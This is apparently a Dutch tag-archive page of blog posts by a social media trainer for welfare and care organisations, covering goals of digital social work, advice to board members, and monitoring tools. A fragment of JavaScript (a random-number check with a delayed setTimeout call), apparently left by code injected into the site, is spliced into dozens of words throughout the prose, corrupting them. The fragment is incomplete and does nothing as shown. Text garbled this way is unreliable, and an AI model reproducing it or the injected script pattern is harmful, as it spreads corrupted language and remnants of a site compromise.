Tag archieven: zichtbaarheid

Wat levert het op?

Sociaal maatschappelijke organisaties inspireren en stimuleren om de kansen van sociale media / sociale technologie en digitale vaardigheid te pakken. Ik help graag bij het accepteren, innoveren en implementeren. Social media opleiding in zorg en welzijn, trainer, workshops en nascholing, coach, adviseur, blogs, columns, spreker en straks een boek (!).

Welke kansen zijn er dan te pakken? Wat levert het je op?
* Digitaal bouwen aan duurzame relaties met je deelnemers / cliënten.
* Het goede imago van je dienstverlening onder inwoners ook online voortzetten.
* Raadsleden betrekken bij je dagelijkse werk.
* Jullie herkenbaarheid in de samenleving vergroten.
* Rechtstreekse lijntjes met de wethouder en beleidsambtenaren leggen.
* Ketenpartners in de wijken vinden en binden.
* Bevorderen van mond op mond reclame, maar dan via social media.
* Tijd besparen door 1 super leuk bericht te plaatsen inplaats van 1001 foldertjes in de bus te doen.
* Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaard informatie digitaal aanbieden om tijd te besparen en je klant beter te helpen.

Mijn klanten vinden het een groot pluspunt dat ik “uit het wereldje zelf kom.” Ik spreek de taal van de sector en ken de mores. Ik help je om digitale middelen zoals social media te borgen in je dagelijkse werk, zodat het bijdraagt om jouw werkdoelen te behalen t.b.v. je cliënt / bewoner / doelgroep. Met Welzijn 3.0 help ik jou en je collega’s graag verder.

Welzijn 3.0 is geaccrediteerd door Registerplein.nl en CRKBO (Centraal Register Kort Beroepsonderwijs). KvK nummer: 52059855. Ik sta als sociaal werker geregistreerd bij Registerplein. Beschikbaar voor korte en langere opdrachten.

Ik ben Hans Versteegh. Ik heb ruim 25 jaar lang ervaring in de uitvoering binnen het sociaal domein. Waarvan veel jaren als opbouwwerker, een prachtig vak. Nog steeds val ik af en toe in en sta ik als sociaal werker geregistreerd bij Registerplein. Op de werkvloer ontdekte ik de kansen van digitalisering voor dit bijzondere veld. En tegelijk kwam ik allerlei drempels en overtuigingen tegen die deze innovatieve ontwikkeling tegenhouden.

Vinden jij en je collega’s dat spannend? Dat snap ik. Zouden jullie daar hulp bij willen hebben? Om digitale middelen zoals social media te borgen in je dagelijkse werk, zodat het helpt om jouw werkdoelen te behalen t.b.v. je cliënt / bewoner / doelgroep? Met Welzijn 3.0 help ik jou en je collega’s graag verder.

 

Blog voor Zorg en Welzijn, juli 2016: “Belangrijk voor bestuurders”

Vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag richt ik me tot u: bestuurder of lid van de Raad van Toezicht (RvT) van een sociaal/maatschappelijke organisatie. Zoals u weet inspireer, train en coach ik sociaal werkers om social media in te zetten in hun dagelijkse werk. Ik help uw medewerkers zich te profileren met al hun kennis expertise en persoonlijkheid, om daarmee een ambassadeur te zijn voor uw organisatie.

Videoboodschap

Maar dit verhaal gaat over u. Want hoe zit het met uw eigen belangstelling voor social media? Bent u er bijvoorbeeld zelf actief? Bent u te vinden op Twitter en LinkedIn? Schrijft u een extern gericht blog? Zet u videoboodschappen in naar uw medewerkers en partners waarin u zelf  in beeld bent?

Mediavaardig

Laten we eerlijk zijn: lang niet alle bestuurders zijn zelf mediavaardig en daardoor schatten ze de waarde voor de organisatie niet goed in. Met name in tijden van crisis hebben zij dan een probleem. Het zijn nu roerige tijden. Uw organisatie ligt onder een vergrootglas. Medewerkers vrezen voor hun baan en financiering is onzeker. Misschien gaat u wel meedingen in een aanbesteding? Of merkt u dat de concurrentie toeneemt?

Visitekaartje

Ik begrijp dat u het druk heeft. Toch vraag u even stil te staan bij de kansen die uw eigen profilering op social media u en uw organisatie kunnen brengen. In de huidige maatschappij gelden waarden als gelijkwaardigheid, delen, transparantie, flexibiliteit, ondernemerschap en benaderbaar zijn. Dat betekent voor u dat van u verwacht wordt dat u het visitekaartje van uw organisatie bent. U bent het gezicht van de organisatie. En het is dus ook aan u om te bouwen aan persoonlijke warme relaties, ook online.

Mens achter de functionaris

Persoonlijk? Jazeker, want we zijn allemaal mensen en heel erg benieuwd naar de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander. Juist als bestuurder is het dus leuk om af en toe iets te laten zien van de mens achter de functionaris. Want klikt het met u als bestuurder, dan klikt het misschien ook wel met uw organisatie. Niet alleen om voor te werken, maar ook om klant van te worden.

Social Media plan

Ik daag u uit: Laat uzelf zien. Maak een social media plan. Want we willen natuurlijk geen vervelende reacties uitlokken. Uw communicatieafdeling kan u daarbij helpen, en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders belt u mij maar. Maak vooral keuzes. Wat wilt u wel en wat wilt u niet van uzelf en uw privéleven openbaar maken?  Zoals minister Lodewijk Ascher ook heeft gedaan. Zijn plan is dit: ik ben een publiek figuur en vaak in functie, maar mijn kinderen mogen niet op de foto. En ik ben tussen 5 en 8 uur ’s avond niet aanspreekbaar. Ik hoop dat u nu niet denkt: “ach, dat zal mijn tijd wel duren.” Want die tijd, die is er nu al.

PS Lees je dit en ben je zelf geen bestuurder, dan geldt dit hele verhaal natuurlijk ook gewoon voor jou.

De 9 doelen van sociale technologie / eSocial

Inschrijven nieuwsbrief

 

In het sociale domein wordt “sociale technologie” of “eSocial” steeds belangrijker; het toepassen van (online) technieken om maatschappelijke doelen te helpen bereiken. Daarmee gaat het maatschappelijke veld mee in de ontwikkeling van de zich digitaliserende netwerksamenleving. 

 

Vaak worden social media daarvoor als ingang genomen. Wellicht mede omdat dit het meest aansluit bij wat werkers in hun prive leven zelf al vaak toepassen. Sociale media zijn relatief eenvoudig op te starten en wie dat doet ervaart redelijk snel positief resultaat (reacties en interactie , uitbreidende netwerken, toegang tot kennis en sleutelposities, etc).Vanuit die ervaring wordt dan de vraag gesteld; “Moeten wij ook als organisatie niet “iets” met social media gaan doen?” 

 

Hieronder vind je een opsomming van doelen die daarbij gesteld worden. Van twee kanten benaderd.

 

Ten eerste de meest voorkomende benadering, sociale technologie toegepast vanuit organisatiebelangen. Maatschappelijke organisaties zoals o.a. in zorg en welzijn staan onder druk door de transitie en bezuinigingen, om waar voor hun geld te leveren en dat zichtbaar te maken. Profileren kan van levensbelang zijn.

 

Ten tweede de minder voorkomende aanvliegroute. Vanuit belangen van doelgroepen (van zorg en welzijn) gedacht. Deze benadering komt vooralsnog veel minder vaak voor. Maar sluit wel inhoudelijk goed aan op de dagelijkse praktijk van uitvoerende werkers in dit domein. Hier invulling aan geven is van wezenlijk belang, willen maatschappelijke organisaties werkelijk met droge ogen kunnen beweren dat hun doelgroepen mede dankzij hun inzet als volwaardige burgers meedoen in de partcipatie-maatschappij.

 

A. Vanuit organisatiebelang gedacht

 

1. Doelgroep
De doelgroep bereiken
Vindplaatsen: dichtbij bekende doelgroepen staan, als vanzelfsprekend onderdeel van hun leefwereld
Voelsprieten: online te weten komen waar en waarover mensen in problemen zitten via social media monitoring
Andere doelgroepen dan gewoonlijk bereiken, nieuwe afzetgebieden aanboren
Met name de 80% inwoners bereiken die iets voor de 15% in een achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andspositie kan betekenen
Door mogelijkheden van mensen in een kansarme positie zichtbaar te maken en te benadrukken naar 80% kansrijken
Meer contacten in de samenleving / het werkgebied / de wijken krijgen

 

2. Zichtbaarheid
Laten zien wat er al gedaan wordt
Iedere medewerker communiceert zelf over zijn / haar werk
Blijf dicht bij jezelf, wat maak jij mee en waar word jij blij van?
De werkzaamheden bekend maken onder een breder publiek
Niet afwachten tot een vraag naar je toekomt maar actief laten zien wat je waarde is
Een groter bereik onder inwoners bewerkstelligen
De naam van de organisatie steviger vestigen onder inwoners en samenwerkingspartners

 

3. Meegaan
Profileren als een moderne organisatie
Meegaan met de beweging die doelgroepen en stakeholders maken
Onderdeel uit maken van de netwerksamenleving / participatiesamenleving
Verbindende rol in de samenleving ook online oppakken, community building

 

4. Einddoel
Bij iedere inwoner in de broekzak zitten

 

B. Vanuit het belang van doelgroepen gedacht

 

5. Mediawijsheid / digivaardigheid / digitale zelfredzaamheid
Accepteren dat niet iedereen zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig mee komt in de digitale maatschappij
De 15% kansarmere helpen participeren in een digitaliserende samenleving
Oog hebben voor digitale achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden als onderdeel van multi-probleem situaties
Kennis van de digitaal geworden sociale kaart
Kennis van de valkuilen van digitale communicatie (wat is wel OK en wat niet)
Vaardigheden om binnen die sociale kaart je doelgroep zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig te leren de weg te vinden
Vaardigheden om per maatschappelijke instantie de verregaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and gedigitaliseerde diensten af te nemen
Eigen kracht en zelfredzaamheid bevorderen door digitale vaardigheden bij te brengen

 

6. Overbruggen van de digitale kloof
Verkleinen van de afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tot de 80% die wel zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig functioneert met behulp van internet.
Moedeloosheid (ik kan het allemaal niet bijhouden) wegnemen
Helpen overzicht te krijgen op eigen situatie
Leren inzien dat de computer kunnen bedienen er in deze tijd bij hoort

 

7. Ondersteuning
De deeleconomie biedt praktische hulp, gratis of voor een wederdienst, via digitale kanalen zoals sociale media en speciale platformen
Ruilen of zelfs weggeven van diensten en goederen via online platforms
 • Goederen zoals kleding, schoenen
 • Eten
 • Woningen
 • Auto’s
 • Kennis bijvoorbeeld over moestuinen
 • Gezelschap
 • Oppas
 • Ontmoeting
 • Liefde, partner vinden

 

8. Thema’s
 • Vergrijzing:              hulp en zorg organiseren
 • Armoede:                de weg weten te vinden naar gratis diensten en goederen
 • Sociaal isolement:  betekenisvol contact met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen aangaan
 • Ontmoeting:           gelijkgestemden vinden
 • Community:            deel uitmaken van een groter geheel, meedoen, er bij horen
 •  Zorgnetwerken:     er niet alleen voor staan, informele hulpverlening, eigen kracht

 

9. Toegang
Praktische ondersteuning bieden, er naast zitten
Kleinschalige digitale oefenplekken in wijken
Opstapplaatsen om met lokale overheden (eParticipatie) en maatschappelijke instanties in contact te treden om zorg te regelen en te ontvangen
Digitaal vaardige Hulpverleners en vrijwilligers, die weten hoe je online kunt verbinden en activeren (opbouwwerk-methodieken)
Leren bedienen van apparatuur als tablets, smartphones en laptops
Leren hoe een abonnement op ADSL, Wifi en G4 afgesloten wordt
Leren bedienen van social media platformen

 

Workshops
Deze maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and geef ik de eerste workshops binnen welzijnsorganisaties waarin deze twee verschillende benaderingen centraal staan.
Meer informatie is bij mij te verkrijgen.
Neem contact op via  h.versteegh@welzijn30.nl
Of bel mij op 06-44062029.

 

Hans Versteegh
Welzijn 3.0

Afrekenen met sociale media knelpunt 4, het overzicht ontbreekt

Social media knelpunt 4, Het overzicht ontbreekt. Na tijdgebrek, geldgebrek, ontbrekend draagvlak en te veel angst komen we nu bij het volgende knelpunt: het ontbreken van overzicht, 33% noemde dit.

Dagelijks wordt op sociale media zo enorm veel geplaatst dat ik de cijfers hier niet eens ga geven. Dat zijn zulke ongrijpbaar grote getallen. Daar kan je je geen voorstelling van maken.

Het is dan ook niet te doen om alle verschillende sociale media vormen bij te houden en actief te gebruiken. Bovendien komen er steeds nieuwe platformen bij en zie je door de bomen het bos niet meer. Er lijkt geen beginnen aan inderdaad. Toch is het mogelijk er een beetje grip op te krijgen. Maar hoe en waar dan wel? Hoe hou je nog een beetje de regie?

Je klant helpt je
Gelukkig heeft jouw klant al voor je gekozen en zijn er in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and een paar social media platformen die er echt met kop en schouder uitsteken.
Facebook, Youtube, Linkedin, Twitter, en Google Plus. Met duizelingwekkende aantallen ingeschreven accounts en dagelijkse actieve gebruikers:

De grote jongens

Facebook      8.9 miljoen Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders, 6.1 miljoen dagelijks

Youtube         7.1 miljoen Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders, 1.1 miljoen dagelijks

Linkedin        4.1 miljoen Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders, 0.3 miljoen dagelijks

Twitter            3.5 miljoen Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders, 1.5 miljoen dagelijks

Google Plus 3.3 miljoen Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders,    1 miljoen dagelijks

(cijfers januari 2014, Newcom Research)

Zie je dat letterlijk half Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and op Facebook zit!
Bizar he?

En dan zijn er natuurlijk nog wagonladingen kleinere platformen zoals Pinterest, Instagram, Foursquare, Snappchat en online berichten-diensten als Whatsapp en Telegram, plus digitale zakelijke (samenwerkings-)tools zoals Yammer, Evernote, Dropbox en verschillende gratis Google diensten.

Waar te beginnen?
Dat is dus aardig veel om mee te starten. Het duurt ook wel even voor je ze allemaal in de vingers hebt. Begin daarom eens met eentje. Namelijk die waar ook jouw doelgroep het meest gebruik van maakt.

Vraag het ze gewoon. En ga je daar eens een maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and intensief mee bezig houden Kijk eens wat ze daar doen. Luister naar wat er gebeurd. Meng je eens in een gesprek. Of start na een poosje zelf een gesprek (dialoog) waarin je wat van je kennis en werkzaamheden of meningen deelt. Natuurlijk hou je dagelijks in de gaten of er ook berichten voor jou binnenkomen. En daar ga je op reageren, toch? Je zoekt immers de dialoog. Op die manier hou je overzicht en kan je toch stappen maken.

Overzicht krijgen als een pro
Wat ik beschreef is hoe je in het begin overzicht krijgt als individuele gebruiker. Mocht je dit nog niet genoeg vinden dan zijn er gelukkig tools die je kunnen helpen overzicht te krijgen.

Luisteren
Maak het jezelf gemakkelijk met Google Alerts. Google gaat op jouw zoekwoorden het internet af en stuurt wat het vindt per mail naar je toe. Nadeel: je hebt een g-mail account nodig en social media accounts worden niet getoond.

Verzamelen en reageren
Hootsuite en Tweetdeck zijn twee gratis en bekende tools waar je social media accounts aan koppelt en per kolom kan zien wat er waar gebeurd. Je kan vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaaruit ook reageren op berichten alsof je zelf op Twitter of Facebook zou zitten. Alles op 1 plek dus, op 1 scherm.

Nog een stap professioneler
Dan kom je in meet- en analyse-instrumenten als Coosto en OBI4wan. Daar moet je voor betalen maar dan heb je ook alles. Overzicht, de mogelijkheid te reageren maar ook analyses van alle berichten zodat je daar (management-) informatie uit kan halen. Grotere bedrijven en overheden gebruiken deze systemen.

Conclusie
Het is dus weldegelijk mogelijk overzicht in de brei informatie op sociale media te krijgen. Van heel eenvoudig tot gespecialiseerd. Het is maar net wat jij en je organisatie willen.

Welzijn 3.0, Hans Versteegh

Hartelijke groeten,
Hans Versteegh
De sociaalste social media trainer, Welzijn 3.0
Mail mij op  h.versteegh@welzijn30.nl of bel mij op 06-44062029.

p.s. Wil je meer van deze tips? Dit knelpunt en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen staan ook in het e-book “Jij kan het ook! Afrekenen met social media knelpunten in Welzijn.” dat binnenkort verschijnt. Wil je dat ontvangen, schrijf je dan in via het formulier hieronder aan de pagina.

Lees ook: https://www.welzijn30.nl/afrekenen-met-social-media-knelpunt-5-weinig-interactie-met-de-doelgroep/

BewarenBewaren